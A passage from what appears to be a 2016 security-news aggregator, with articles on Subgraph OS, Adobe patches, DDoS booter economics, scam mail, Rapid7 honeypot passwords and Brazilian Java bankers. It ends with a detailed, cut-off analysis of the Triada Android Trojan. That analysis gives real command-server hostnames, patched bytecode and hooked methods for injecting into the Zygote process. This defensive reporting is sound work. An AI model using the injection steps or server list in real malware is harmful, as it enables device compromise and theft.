Since every application does not come preconfigured to communicate through TOR, Metaproxy relays outgoing connections via TOR without having to configure proxy settings for each application.
5. System and Kernel Security
Subgraph OS is also hardened by Grsecurity – a set of patches that are designed to make Linux kernel's security vulnerabilities like memory corruption flaws far more difficult to exploit.
Support of 'PaX' would be an extra topping of security that aid with least privilege protection for memory pages. This would make security vulnerabilities such as buffer overflow and memory corruption flaws in applications and the operating system kernel difficult to exploit.
6. Secure Mail Services
Secure Mail Services
As everything is concerned, Subgraph OS includes Subgraph Mail that integrates OpenPGP to let users send and receive encrypted/signed messages using PGP/MIME.
Subgraph Mail service is designed in such a way that makes PGP key management and sending/receiving of encrypted email easy for everybody.
Subgraph Mail is also secure – Unlike Data security, authentication and integrity verification are implemented in such a way that even if some parts of the application are compromised, a hacker still would not have access to the rest of your emails or encryption keys.
Additionally, there is no need to execute commands in a terminal window or install plug-ins. Web browser support is deliberately left out of the mail client to eliminate Web exploits from within mail.
7. Package Integrity

Subgraph OS also provides an alternative way to trust the downloaded packages. The packages are to be matched against the binaries present in the operating system's distributed package list, thus becoming a finalizer.
Recently Backdoored Linux Mint hacking incident is an example to this.
Thus, Subgraph OS eliminates the usage of any tampered or malicious downloaded packages.
Comparison Between Subgraph OS and Qubes OS
most-secure-operating-system
Subgraph OS has some similarities to Qubes OS – Another Linux-based security-oriented operating system for PCs.
Unlike Subgraph OS that isolates individual applications on a more granular level, Qubes OS typically runs different isolated domains inside different virtual machines – one for your work, one for your personal use and more.
Subgraph OS doesn't isolate networking and USB stacks or other devices and drivers, but Qubes OS does.
Also, Subgraph OS uses Xpra for GUI virtualization, which is less secure than Qubes GUI protocol, but has some usability advantages like seamless working clipboard.
Subgraph makes use of Netfilter hooks to redirect app-generated traffic into TOR network and to allow the user to see and control app-generated traffic, but Qubes OS uses separate service Virtual Machines (Proxy VMs like TorVM) to intercept traffic.
As the list goes on... Subgraph would be a treasure for the privacy lovers.
How to Download Subgraph Os?
Subgraph Os will be available for download via its offical website. Let's wait for the operating system to get unveiled in Logan CIJ Symposium conference in Berlin on March 11-12 to experience the Cyber Isolation!!!


Take note, next week update Adobe Reader and Acrobat to fix critical flaws
4.3.2016 Vulnerebility

Adobe announced that it will release security updates next week to patch vulnerabilities in Acrobat and Reader products for Windows and Mac.
Adobe has announced yesterday, March 8, that it will release security updates next week to patch vulnerabilities in Acrobat and Reader products for Windows and Mac.

We are speaking about critical vulnerabilities that fortunately are currently not exploited in the wild, for this reason, the security team at Adobe has assigned a priority rating “2” to the vulnerabilities explaining that it’s unlikely that they will be abused by malicious actors in the near future.

Adobe has issued a prenotification advisory to explain which product versions are affected by the security vulnerabilities and anticipating the imminent release of security patches.

“Adobe is planning to release security updates on Tuesday, March 8, 2016 for Adobe Acrobat and Reader for Windows and Macintosh.” states the advisory “Users may monitor the latest information on the Adobe Product Security Incident Response Team (PSIRT) blog at https://blogs.adobe.com/psirt.”
In the following table are reported the affected versions and the priority rate assigned by Adobe:

Adobe Acrobat and Reader vulnerabilities

Adobe Acrobat and Reader are among the software most targeted by hackers in numerous attacks in the wild, the company is spending a significant effort in promptly fixing any reported security hole.

In January, Adobe released Acrobat and Reader updates to fix a total of 17 flaws, including use-after-free vulnerabilities (CVE-2016-0932, CVE-2016-0934, CVE-2016-0937, CVE-2016-0940, CVE-2016-0941), a double-free flaw (CVE-2016-0935) that could lead to code execution, and several memory corruption vulnerabilities that can be exploited for arbitrary code execution (CVE-2016-0931, CVE-2016-0933, CVE-2016-0936, CVE-2016-0938, CVE-2016-0939, CVE-2016-0942, CVE-2016-0944, CVE-2016-0945, CVE-2016-0946).

Users are invited to update their software as soon as the security patches become available.

According to data provided by the CVE Details Adobe software are among the software with the highest number of vulnerabilities in 2015.

The data were provided by CVE Details, which manages data coming from the National Vulnerability Database (NVD). Common Vulnerabilities and Exposures (CVE) system tracks publicly disclosed security vulnerabilities.

The software with the major number of vulnerabilities is the Apple Mac OS X, that accounted for 384 vulnerabilities, followed by Apple iOS with 375 vulnerabilities. The Adobe Flash Player is just at third place with 314 vulnerabilities, followed by Adobe AIR SDK, with 246 vulnerabilities and Adobe AIR itself, also with 246 vulnerabilities.

Last year, Adobe patched a total of 460 vulnerabilities, including more than 100 in Acrobat and Reader.


A day attack with DDoS booter cost $60 and can cause $720k in damage
4.3.2016 Computer Attack

According to a study conducted by the experts at Arbor’s ASERT Team a day attack with a DDoS booter cost $60 and can cause $720k in damage.
We have discussed several times about the concept of cybercrime-as-a-service, today I’ll show you a case related the offer for rent of distributed-denial-of-service (DDoS) attacks for less than US$60 per day.

According to Dennis Schwarz, Research Analyst on Arbor’s ASERT Team, a DDoS attack that costs US$60 per day could inflict as much as US$720,000 in damage to the victim organisation. Technically, these services are called booter or stresser services and could be sold as would-be legitimate tools for security professionals that need to test the resilience of their infrastructure to cyber attacks or their capacity to support a high-volume of traffic.

The problem is that criminal organisations are abusing booters for illegal DDoS attacks, one of the most popular examples is the one used by the LizardSquad hacking crew, the LizardStresser.

The popular security expert Brian Krebs and a research team discovered that the Lizard Stresser DDoS tool relies on compromised Home Routers, this is very common for such kind of illegal services.Schwarz examined one

Schwarz examined one booter service sold in the Russian underground a user with the pseudonym of Forceful. The researcher has compared the cost to rent per day with the average damage suffered by the victims.

Schwarz noticed numerous advertisements for a DDoS booter service on one of the many public Russian language forums, one of them was published by a bad actor known as “Forceful” who operated one of these services. Searching for ICQ number and/or Jabber address the experts discovered a number of advertisements starting from November 2014.

The ads typically contain:

A fancy logo, banner, or motto
Short explanation of what DDoS is
Type of DDoS attacks they support
Pricing
Reputation information
Contact details
Forceful charges $60 a day to rent the booter, meanwhile the cost on an entire week is $400, and anyway it offers a 10-minute test sessions to its clients.

ddos booter advertising

“In this marketplace, it almost always starts with an advertisement for a DDoS booter service on one of the many public Russian language forums,” Schwarz says.

ddos booter cost cybercrime

Thanks to a series of OPSEC mistakes made by Forceful, Schwarz and his team were able to identify the malware used by the threat actor and the structure of botnet he uses.
According to the Arbor Worldwide Infrastructure Security Report the average suffered by victims of the attack is US$500 per minute. The cost is attributable to downtime of the targeted infrastructure, reputational damage, and the price of remediation.

According to the data elaborated by the experts, a booter attack could cause US$7.2 million in damages a day, costs that could be drastically reduced by the adoption of DDoS defense solutions.

Schwarz highlighted the extreme asymmetry of the economics of DDoS attackers and urged organizations in adopting defensive solutions.

“As we see in Arbor’s most recent Worldwide Infrastructure Security Report (WISR), the average cost to the victim of a DDoS attack is around $500 per minute. And as we’ve seen above, the mean cost to the attacker is only $66 per attack. This finding highlights both the extreme asymmetry of the economics of DDoS attackers vs. those of the victims of DDoS attacks, as well as the importance of robust DDoS defenses to all organizations which depend upon their online presence for revenue, customer support, and other important business functions. The cost to launch a DDoS attack is so low that the barrier to entry for attackers is practically nil – and that means that *any* organization can potentially be the target of a DDoS attack, since the investment required to launch an attack is so low.”

According to Arbor Network’s BladeRunner, from July to October the Forceful’s booter bot was rented for 82 attacks equaling $5,408.


Amazon used as bait
4.3.2016 Zdroj: Kaspersky Safety
In recent weeks, we have seen several mass-mailings in French, Italian and English, imitating messages from Amazon’s online shops. In all the mailings, the recipients were offered a voucher, a gift certificate or some other prize.

The enticing offers were mostly sent from Italy or France. However, the email addresses from which they were sent immediately raised suspicions: the culprits didn’t even try to imitate Amazon’s official email addresses, and merely used Amazon in the sender’s name.

 

Each message contains links that supposedly lead to the Amazon website. The recipients have to click the links to claim their “prize”. Analysis of the links shows that users from different countries are redirected to different web pages. For instance, users with a European IP address are asked to fill in a form in English, and are offered the chance to enter a draw for an iPhone 6S as a reward.

 

The winner is promised a new smartphone for just 1 euro, but first has to enter their bank card details on the video streaming site myflixhd[.]com.

 

The website offers a 5-day trial period, but requires the user’s bank card details, and then deducts a subscription fee of 50 euros per month if the user fails to cancel the subscription on time.

Naturally, Amazon has nothing to do with this “draw” or any other similar scams, and the chances of winning an iPhone 6S are very slim, to say the least. There is a good chance, however, that the bank card details entered on this advertising web page will be used by third parties for their own ends.


Komplexní bezpečnostní služby včetně školení v češtině nabízí Kaspersky

4.3.2016 Zabezpečení
Služby Security Intelligence Services, které slouží především pro bezpečnostní operační střediska, korporace a poskytovatele služeb, spustil Kaspersky Lab. V jeho rámci Security Intelligence Services mají uživatelé k dispozici data o hrozbách, reporting zpravodajských informací, online a onsite školení a program zvýšení povědomí o bezpečnosti nebo specializované služby jako penetrační testování a posouzení zabezpečení aplikací.

Služby se skládají ze tří hlavních součástí – analýzy bezpečnosti, školení a zpravodajství o hrozbách. Ty jsou navrženy tak, aby splňovaly požadavky korporací, vládních agentur, poskytovatelů internetového připojení, telekomunikačních společností a poskytovatelů bezpečnostních služeb.

Novinka v podobě analýzy bezpečnosti zahrnuje penetrační testování a posouzení zabezpečení aplikací. Tyto služby umožní klientům předvídat specifika kybernetického útoku ještě před tím, než se odehraje. Podporou těchto služeb se zabývá specializovaný tým analytiků Kaspersky Lab, který může otestovat zabezpečení podniku proti široké škále napadení.

Školení kybernetické bezpečnosti uplatňuje techniky herních designů (gamifikace) a je založené na nejnovějších zpravodajských informačních službách v oblasti sociálního inženýrství a cílených útoků, čímž prý ztělesňuje princip prožitkového učení. Tento program určený zaměstnancům je možné vést i v češtině. A konečně zpravodajství nabízí přístup k datům Kaspersky Lab skrze datové kanály pro informace o hrozbách a sledování botnetů. Datové kanály pro informace o hrozbách obsahují nejaktuálnější data o škodlivých programech a URL adresách, phishingových útocích a mobilních hrozbách.

Navíc jsou kompatibilní s oblíbenými SIEM (Security Information and Event Management) řešeními třetích stran. Informace jsou dostupné také ve formě reportingu o hrozbách, který je připravován na míru na základě specifických aspektů prostředí hrozeb a zpráv o nejnovějších a nejsofistikovanějších hrozbách.


US starts cyber operations against the ISIL in Mosul

4.3.2016 Hacking

Senior Pentagon officials on Monday revealed the military’s first use of cyber warfare operations against the ISIL terrorist group.
The US military has started launching cyber attacks against members of the terrorist organization ISIS as part of the operation conducted to take back the Iraqi city of Mosul.

The US military is using cyber tools to contrast the ISIS troops in the area, interfering members’ operation and communication.

“By encircling and taking this town, we are also working to sever the last major artery between Raqqa and Mosul, an operation critical to dissecting ISIL’s parent tumor into two parts in Iraq and Syria. At the same time, we’re bombing ISIL’s banks as well as oil wells they’ve taken over or coerced others into operating on their behalf. We’re also using cyber tools to disrupt ISIL’s ability to operate and communicate over the virtual battlefield.” announced the Defense Secretary Ash Carter at a Monday Pentagon press briefing. that U.S. forces are using cyber tools to disrupt ISIS’s ability to operate and communicate over the virtual battlefield.

According to Carter, the goal of the cyber operations is the disruption of the ISIL‘s command and control, particularly in Syria.

” I think you’re referring to our use of cyber which we have talked about generally. In the counter-ISIL campaign in — particularly in Syria to interrupt, disrupt ISIL’s command and control, to cause them to lose confidence in their networks, to overload their network so that they can’t function, and do all of these things that will interrupt their ability to command and control forces there, control the population and the economy.” added Carter.

“So this is something that’s new in this war, not something you would’ve seen back in the Gulf War, but it’s an important new capability and it is an important use of our Cyber Command and the reason that Cyber Command was established in the first place.”

The US Government has already started the cyber operations that the US Cyber Command is carrying out.

“we’re trying to both physically and virtually isolate ISIL, limit their ability to conduct command and control, limit their ability to communicate with each other, limit their ability to conduct operations locally and tactically.” said Joint Chiefs Chairman General Joseph Dunford.

“And frankly, they’re going to experience some friction that’s associated with us and some friction that’s just associated with the normal course of events in dealing in the information age.”


Which are most used passwords in opportunistic criminal attacks?

4.3.2016 Computer Attack

Which are the usernames and passwords used by hackers when they scan the internet indiscriminately? Give a look to the Rapid7′ report
Recently the firm Splashdata revealed in its annual report on the worst 2015 passwords (“123456” and “password”), today I desire to present you a new interesting study on passwords conducted by Rapid7.

The experts used Heisenberg, a network of low-interaction honeypots that took note of the most common passwords used the hackers in targeting Internet-exposed systems.

The research conducted by Rapid7 has focused on the brute force attacks that tried to guess Remote Desktop Protocol (RDP) credentials for control home, point-of-sale (PoS), and kiosk systems.

“Attackers do not merely pick random strings as passwords (or usernames). Such brute force attacks are process intensive, time consuming, and tend to have very poor performance from the attacker’s point of view. Instead, attackers in our data set were clearly conducting dictionary attacks; i.e. they were using chosen usernames and passwords that have an assumed high likelihood of success when applied to a target system. ” states the report published by Rapid7.

The experts analyzed more than 221,000 attacks from 119 different countries observed between March 2015 and February 2016. 40 percent of the attacks came from China, followed by the United States with 25 percent of attempts, South Korea with 6 percent, the Netherlands with 5 percent and Vietnam with 3 percent.

passwords honeypot attacks 2

The most common usernames attempted by hackerd were “administrator” and “Administrator,” (60%), other usernames are “user1,” “admin,” “alex,” “pos,” “demo,” “db2admin,” “Admin” and “sql.”

The most common passwords “x” (5,36 %), “Zz” (4,79%) and “St@rt123” (3,62%).

“Truly, the surprising detail to be uncovered here is just how weak these passwords are. One or two characters, easily guessed strings, and a strange appearance of a series of dots. Since these passwords were deliberately chosen by the various scanners which ran up against Heisenberg, it implies that the default and common passwords to several POS and kiosk systems are chosen out of convenience, rather than security.” continues the report.

passwords honeypot attacks

The experts used Dropbox’s Zxcvbn application for measuring password complexity, determining that less than 9 percent of the passwords used by hackers got the highest score, meanwhile 14.3 percent scored “3.”

“Zxcvbn is hosted on a GitHub repository and was released by Dropbox with a permissive open source license. Rapid7 data scientists and software engineers absolutely love well-cared-for open source projects, so we have adopted zxcvbn as a means to measure the complexity of Heisenberg-collected passwords. By running our collected passwords through zxcvbn, we can approximate “complexity” with zxcvbn’s crackability score.”


First step in cross-platform Trojan bankers from Brazil done
3.3.2016 Zdroj: Kaspersky Virus
Brazilian cybercriminals have been “competing” with their Russian-speaking “colleagues” for a while in who makes more Trojan bankers and whose are most effective. A few days ago we found a new wave of different campaigns spreading the initial “Banloader” components in Jar (Java archive), which is very particular by its nature – it’s able to run on Linux, OS X, and of course Windows. Actually, it’s also able to run under certain circumstances even on mobile devices.

Social engineering

Social engineering actually varies from vehicle taxes or fines to boleto’s payment system and even a kind of electronic debt call center.

 

Some emails come with download links to Jar files, while others directly spread Jar inside archives, so the end user does not need to download anything from the Internet.

Infection

Everything happens when the victims make a click – and we should remember Brazilian cybercriminals are experts in social engineering. So, right, the victim makes a click. What happens next? That also varies. It depends on which group is behind that particular attack. We say this because we have seen different cyber-criminal gangs from Brazil that are clearly not related actively using Jar files to seed bankers.

The fact is, as long as the victim has Java locally installed, the “Banloader” will run and it doesn’t matter if it’s OS X, Linux or Windows.

Some groups just go for traditional PAC modifications, redirecting victims to fake bank websites:

 

While others work with slightly more complex obfuscating Jar routines using DES or RSA algos.

 

Once deobfuscated it’s clear it drops a file to the system, which is actually the Banker in charge of stealing the victim’s money:

 

Interesting strings

Whether it’s intentional or not, the cybercriminals left strings. Here are the strings found in different Jar-based Trojan Banker samples:

“liberdade” – freedom, liberty
“maravilha” – miracle, thing of beauty

Why is it important?

Because Jar files run on Windows, OS X and Linux, wherever Java is installed. This is the very first step cybercriminals from Brazil have made towards “cross-platforming“.

What does it mean?

Brazilian Trojan Banker coders are now making Trojans running on all platforms and not only Windows.

Does it mean that OS X and Linux users are now also a target of Brazilian bankers?

Not yet. We say this because the banloaders (initial components) come in Jar but the final components (dropped malware) are still designed to run in Windows or they use a Windows system in the case of PAC abusing. However, it’s clear the first step to cross-platforming has just been made. So, it’s a matter of time till we will find Brazilian bankers running on all platforms.

Are Brazilian coders going to release full bankers – bandleaders and bankers running exclusively on Jar?

There is no reason to believe they won’t. They have just started and they won’t stop.

How stealthy is their Jar malware?

Actually, the general detection rate for ALL AV vendors is extremely low.

What is the detection name Kaspersky Lab products use to detect this threat?

Depending on the characteristics of each sample it may fall into one of the following families:

Trojan-Banker.Java.Agent
Trojan-Downloader.Java.Banload
Trojan-Downloader.Java.Agent

Where are most of the victims located?

Naturally Brazil, Spain and then Portugal, the United States, Argentina and Mexico.

 

Why are there victims in Germany and China?

The same malware techniques have been used by other threat actors and detected under the same malware family.


Attack on Zygote: a new twist in the evolution of mobile threats
3.3.2016 Zdroj: Kaspersky Mobil

The main danger posed by apps that gain root access to a mobile device without the user’s knowledge is that they can provide access to far more advanced and dangerous malware with highly innovative architecture. We feared that Trojans obtaining unauthorized superuser privileges to install legitimate apps and display advertising would eventually start installing malware. And our worst fears have been realized: rooting malware has begun spreading the most sophisticated mobile Trojans we have ever seen.

Rooting malware

In our previous article we wrote about the increasing popularity of malware for Android that gains root access to a device and uses it to install apps and display aggressive advertising. Once this type of malicious program penetrates a device, it often becomes virtually impossible to use it due to the sheer number of annoying ads and installed apps.

Since the first article (August 2015), things have changed for the worse – the number of malware families of this type has increased from four to 11 and they are spreading more actively and becoming much better at “rooting”. According to our estimates, Trojans with superuser privileges attacked about 10% of Android-based mobile devices in the second half of 2015. There were also cases of these programs being pre-installed on new mobile devices coming from China.

However, it’s worth noting that Android-based devices running versions higher than 4.4.4 have much fewer vulnerabilities that can be exploited to gain root access. So basically, the malware targets earlier versions of the OS that are still installed on the majority of devices. The chart below shows the distribution of our product users by Android version. As can be seen from the chart, about 60% use a device on which these Trojans can gain root access.

 

Versions of Android OS used by users of our products

The owners of the Trojans described above, such as Leech, Ztorg, Gorpo (as well as the new malware family Trojan.AndroidOS.Iop) are working together. Devices infected by these malicious programs usually form a kind of “advertising botnet” via which advertising Trojans distribute each other as well as the advertised apps. Within a few minutes of installing one of these Trojans, all other active malware on the “network” is enabled on the victim’s device. Cybercriminals are cashing in on advertising and installing legitimate applications.

In 2015, this “advertising botnet” was used to distribute malware posing a direct threat to the user. This is how one of the most sophisticated mobile Trojans we have ever analyzed was spread.

Unique Trojan

The “advertising botnet” mentioned above was used to distribute a unique Trojan with the following features:

Modular functionality with active use of superuser privileges
Main part of malicious functionality exists in device RAM only.
Trojan modifies Zygote system process in the memory to achieve persistence.
Industrial approaches used in its development, suggesting its authors are highly qualified.
The Trojan is installed in the folder containing the system applications, under names that system applications are likely to have (e.g. AndroidGuardianship.apk, GoogleServerInfo.apk, USBUsageInfo.apk etc.).

Before starting work, the malicious program collects the following information:

Name of the device
Version of the operating system
Size of the SD card
Information about device memory (from the file /proc/mem)
IMEI
IMSI
List of applications installed
The collected information is sent to the cybercriminals’ server whose address the Trojan receives from a list written in the code:

bridgeph2.zgxuanhao.com:8088
bridgeph2.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph4.zgxuanhao.com:8088
bridgeph2.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph4.viewvogue.com:8088
Or, if the above servers are unavailable, from a list of reserve command servers also written in the code:

bridgecr1.tailebaby.com:8088
bridgecr2.tailebaby.com:8088
bridgecr3.tailebaby.com:8088
bridgecr4.tailebaby.com:8088
bridgecr1.hanltlaw.com:8088
bridgecr2.hanltlaw.com:8088
bridgecr3.hanltlaw.com:8088
bridgecr4.hanltlaw.com:8088
In reply, an encrypted configuration file arrives and is stored as /system/app/com.sms.server.socialgraphop.db. The configuration is regularly updated and contains the following fields:

mSericode – malware identifier
mDevicekey – the device identifier generated on the server (stored in /system/app/OPBKEY_< mDevicekey >);
mServerdevicekey – the current server identifier
mCD – information used by cybercriminals to adjust the behavior of the modules;
mHeartbeat – execution interval for the “heartbeatRequest” interface
mInterval – interval at which requests are sent to the command server
mStartInterval – time after which the uploaded DEX files (modules) are run
mServerDomains – list of main domains
mCrashDomains – list of reserve domains
mModuleUpdate – links required to download the DEX files (modules).
If the mModuleUpdate field is not filled, the DEX files are downloaded and saved. Then these files are downloaded in the context of the malicious program using DexClassLoader.loadClass(). After that, the modules are removed from the disk, i.e. they only remain in device memory, which seriously hampers their detection and removal by antivirus programs.

The downloaded modules should have the following interface methods for proper execution:

init(Context context) – used to initialize the modules
exit(Context context) – used to complete the work of the modules
boardcastOnReceive(Context context, Intent intent) – used to redirect broadcast messages to the module;
heartbeatRequest(Context context) – used to initiate the module request to the command server. It is needed in order to obtain the data module required by the server;
heartbeatResponce(Context context, HashMap serverResponse) – used to deliver the command server response to the module.
Depending on the version, the following set of interfaces may be used:

init(Context context) – used to initialize the modules
exec() – used to execute the payload
exit(Context context) – used to complete the work of the modules
This sort of mechanism allows the app downloader to execute modules implementing different functionality, as well as coordinating and synchronizing them.

The apps and the loaded modules use the “android bin”, “conbb”, “configopb”, “feedback” and “systemcore” files stored in the folder /system/bin to perform various actions on the system using superuser privileges. It goes without saying that a clean system does contain these files.

Considering the aforementioned modular architecture and privileged access to the device, the malware can create literally anything. The capabilities of the uploaded modules are limited only by the imagination and skills of the virus writers. These malicious programs (the app loader and the modules that it downloads) belong to different types of Trojans, but all of them were all included in our antivirus databases under the name Triada.

At the time of analysis the app downloader (detected by us as Backdoor.AndroidOS.Triada) downloaded and activated the following modules:

OPBUpdate_3000/Calendar_1000 – two modules with duplicate functionality capable of downloading, installing and running an application (detected as Trojan-Downloader.AndroidOS.Triada.a).
Registered_1000 – module capable of sending an SMS upon the request of the command server. Detected as Trojan-SMS.AndroidOS.Triada.a.
Idleinfo_1000 – module that targets applications that use SMS to make in-app purchases (intercepts outgoing text messages). Detected as Trojan-Banker.AndroidOS.Triada.a.
Use of the Zygote process

A distinctive feature of the malicious application is the use of the Zygote process to implement its code in the context of all the applications on the device. The Zygote process is the parent process for all Android applications. It contains system libraries and frameworks used by almost all applications. This process is a template for each new application, which means that once the Trojan enters the process, it becomes part of the template and will end up in each application run on the device. This is the first time we have come across this technique in the wild; Zygote was only previously used in proof-of-concepts.

The chart below shows the architecture of the malicious program.

 

Let us take a closer look at how the Zygote process is infected.

Preparatory stage and testing

All the magic starts in the crackZygoteProcess() function from the Trojan-Banker module. Its code is displayed in the screenshot below.

 

First, the Trojan loads the shared library libconfigpppm.so and invokes the configPPP() function exported by this library (the first highlighted string on the screenshot). Second, if configPPP() succeeds in calling System.getProperty() from Android API with the unusual argument ‘pp.pp.pp’ (it will be explained later why this action is performed) and the returned value is not null, the Trojan runs the ELF-executable configpppi with the PID of the zygote process as an argument.

Let’s go through the process in order. The first thing the Trojan does inside the configPPP() function from libconfigpppm.so is to obtain the load address (in the address space of its process) of the file that implements the ActivityThread.main() function from Android API. Next, using the load address and /proc/self/maps, the Trojan discovers the name and path to the file on the disk. In most cases, it will be /system/framework/framework.odex.

The Trojan reads this file from disk and compares it with the file that is already loaded in the address space. The comparison is performed as follows:

The file is divided into 16 blocks;
The first 8 bytes of each block are read;
These 8-byte sequences are compared with the corresponding sequences from the file that loaded in memory;
If the comparison fails, configPPP aborts its execution and returns a 103 error code. If the comparison succeeds, the Trojan starts patching framework.odex in memory.

Then, the malware obtains the Class structure of ActivityThread (which is defined in framework.odex) by using dexFindClass and dexGetClassData functions. The authors of the malware copied these functions from Dalvik Virtual Machine. The structure contains various information about a dex class and is defined in AOSP. Using the structure, Triada iterates through a list of methods implemented in this class looking for a method named “main”. After the method has been found, the Trojan obtains its bytecode with the help of the dexGetCode function (also copied from open sources). When the bytecode is obtained, it is compared with the corresponding bytecode from the file on the disk, thereby checking if the framework has already been patched. If the method has already been patched, the malware aborts its execution and returns a 103 error code.

After that, the Trojan starts looking for the first string in the DEX strings table that are between 32 and 64 symbols long. After a string has been found, the Trojan replaces it with “/system/lib/libconfigpppl.so” and saves its ID.

Next, Triada accesses the DEX methods table and tries to obtain a method with one of the following names – “loop“, “attach” or “setArgV0“. It takes the first one that occurs in the table, or, if there are no methods with these names, the penultimate method from the DEX methods table, and replaces it with a standard System.load() method (one that loads shared libraries to process address space) and saves its ID. The pseudocode that performs this manipulation is shown below.

 

After these actions, the preparatory stage is complete, and the Trojan performs the actual patching. It modifies the memory of the process, adding the following instructions to the bytecode of the “main” method of the ActivityThread class:

1A 00 [strID, 2 bytes] //const-string v0, “/system/lib/libconfigpppl.so”
71 10 [methID, 2 bytes] 00 00 //invoke-static {v0}, Ljava/lang/System;->load(Ljava/lang/String;)V
0E 00 //return-void

where strID is thesaved ID of the replaced string, and methID is the saved ID of the replaced method.

After these modifications, when ActivityThread.main() is called, it will automatically load the shared library “/system/lib/libconfigpppl.so” to the context of the caller process. But because framework.odex is only patched in the context of the Trojan process, the library will only be uploaded in the Trojan process. This seemingly meaningless action is performed in order to test the ability of the malicious program to modify the Zygote process. If the steps described above do not cause errors in the context of the application, they will not cause errors in the context of the system process. Such a complex operation as changing the Zygote address space has been approached very carefully by the attackers, since the slightest error in this process can result in immediate system failure. That is why the “test run” is performed to check the efficiency of the methods on the user’s device.

At the end configPPP() writes the following data to “/data/configppp/cpppimpt.db“:

ID of replaced string (4 bytes);
Content of replaced string (64 bytes);
ID of replaced method (4 bytes);
Pointer to the Method structure for replaced method (4 bytes);
Content of the Method structure for ActivityThread.main() (52 bytes);
Load address of framework.odex (4 bytes);
List of structures that contain (previously used for comparison, 192 bytes):
Pointer to the next block of framework.odex;
First 8 bytes of the block:
Size of framework.odex in memory (before patching) (4 bytes);
Pointer to the DexFile structure for framework.odex (4 bytes);
Content of the DexFile structure for framework.odex (44 bytes);
Pointer to the Method structure for System.load() (4 bytes);
Size of ActivityThread.main() bytecode before patching (4 bytes);
Bytecode of ActivityThread.main() before patching (variable);
Finally, the Trojan calls the patched ActivityThread.main(), thus loading /system/lib/libconfigpppl.so in its address space. We will describe the purpose of this library after explaining the functionality of the configpppi ELF-executable that performs the actual modification of Zygote’s address space.

Modification of the Zygote

In fact, configpppi also patches ActivityThread.main() from framework.odex, but unlike libconfigpppm.so, it receives the PID of a process running on the system as an argument and performs patching in the context of this process. In this case, the Trojan patches the Zygote process. It uses information obtained at the previous stage (in libconfigpppm.so) and stored in /data/configppp/cpppimpt.db to modify the Zygote process via ptrace system­­­­­ calls.

The Zygote process is a daemon whose purpose is to launch Android applications. It receives requests to launch an application through /dev/socket/zygote. Every launch request triggers a fork() call. When fork() occurs the system creates a clone of the process – a child process that is a full copy of a parent. Zygote contains all the necessary system libraries and frameworks, so every new Android application will receive everything it needs to execute. This means every application is a child of the Zygote process and after patching, every new application will receive framework.odex modified by the Trojan (with libconfigpppl.so injected). In other words, libconfigpppl.so ends up in all new apps and can modify how they work. This opens up a wide range of opportunities for the cybercriminals.

Substitution of standard Android Framework features

When the shared library /system/lib/libconfigpppl.so is loaded inside the Zygote by System.load(), the system invokes its JNI_OnLoad() function. First, the Trojan restores the string and method replaced earlier by /system/lib/libconfigpppm.so or configpppi, using the information from /data/configppp/cpppimpt.db. Second, Triada loads the DEX file configpppl.jar. This is done with the help of a standard Android API via dalvik.system.DexClassLoader.

 

To ensure that DEX is successfully loaded, the Trojan calls its method pppMain from the PPPMain class. This method only outputs to logcat string “PPP main started”.

 

The next stage is to prepare hooks for some methods from Android Framework (framework.odex). The malware checks if everything necessary for hook methods exist in configpppl.jar (it uses the internal checkPackageMethodExits() method for this). The Trojan then prepares hooks for the following methods:

java.lang.System.getProperty()
android.app.Instrumentation.newApplication()
com.android.internal.telephony.SMSDispatcher.dispatchPdus()
android.app.ActivityManager.getRunningServices()
android.app.ActivityManager.getRunningAppProcesses()
android.app.ApplicationPackageManager.getInstalledPackages()
android.app.ApplicationPackageManager.getInstalledApplications()
The hooks are placed using the standard RegisterNatives() function. This function is designed to perform binding Java methods with their native implementation (i.e. written with C/C++). Thus, the Trojan substitutes standard methods from Android Framework with methods implemented in libconfigpppl.so.

Verifying the success of a Zygote modification

The function which substitutes the original getProperty() first checks its argument. If the argument is the “pp.pp.pp” string (which was mentioned earlier), then the function immediately returns “true”. Otherwise, it calls the original getProperty() with its passed argument. Calling the hooked getProperty() with “pp.pp.pp” as an argument is used to check whether or not hooking of Android Framework functions was successful. If the hooked getProperty() returned “true”, then the Trojan will start configpppi ELF with the PID of the Zygote process as an argument.

After that, the the Trojan “kills” processes of the applications: “com.android.phone”, “com.android.settings”, “com.android.mms”. These are the standard “Phone”, “Settings” and “Messaging” – applications that are the Trojan’s primary targets. The system starts these apps automatically the next time the device is unblocked. After they start they will contain framework.odex with all the hooks placed by libconfigpppl.so.

Modification of outgoing text messages

The function which substitutes newApplication(), first calls the original function, and then invokes two functions from configpppl.jar: onModuleCreate() and onModuleInit().

The function onModuleCreate() checks in the context of the application it is running and then sets the global variable mMainAppType according to the results of checking:

If function is running within com.android.phone, then mMainAppType set to 1;
If function is running within com.android.settings or com.android.mms, then mMainAppType set to 2;
If function is running within one of these apps: com.android.system.google.server.info, com.android.system.guardianship.info.server, com.android.sys.op, com.android.system.op., com.android.system.kylin., com.android.kylines, com.android.email, com.android.contacts, android.process.media, com.android.launcher, com.android.browser, then mMainAppType set to -1;
If function is running within any other application, then mMainAppType set to 0;
Depending on the value of mMainAppType, the function onModuleInit() calls one of the initialization routines:

 

Thus, the Trojan tracks its host application and changes its behavior accordingly. For example, if mMainAppType is set to -1 (i.e. the host application is com.android.email, com.android.contacts etc.), the Trojan does nothing.

If the host application is com.android.phone, Triada registers broadcast receivers for the intents with actions com.ops.sms.core.broadcast.request.status and com.ops.sms.core.broadcast.back.open.gprs.network. It first sets the global variable mLastSmsShieldStatusTime to the current date and time, then turns on mobile network data (GPRS Internet).

If the host application is com.android.settings or com.android.mms, Triada registers broadcast receivers for the intents with the following actions:

com.ops.sms.core.broadcast.request.status;
com.ops.sms.core.broadcast.back.open.gprs.network;
com.ops.sms.core.broadcast.back.send.sms.address.
The first two are the same as in the previous case, and the third sends an SMS, which is passed off as extra intent data.

If the host application is any other app (apart from apps that trigger mMainAppType = -1), then Triada first checks whether or not the application uses the shared library libsmsiap.so:

 

Depending on the result, it calls one of the following functions: PISmsCore.invokeMMMain() or PISmsCore.invokeOtherMain().

Both functions invoke the PISmsCore.initInstance() method which performs the following actions:

Initialization of the Trojan’s global variables with various information about the infected device (IMEI, IMSI etc.);
Substitution of the system binders “isms” and “isms2”, which are used by the parent application along with its own ones;
 

 

Creation of multiple directories /sdcard/Android/com/register/, used for write log and configuration files;
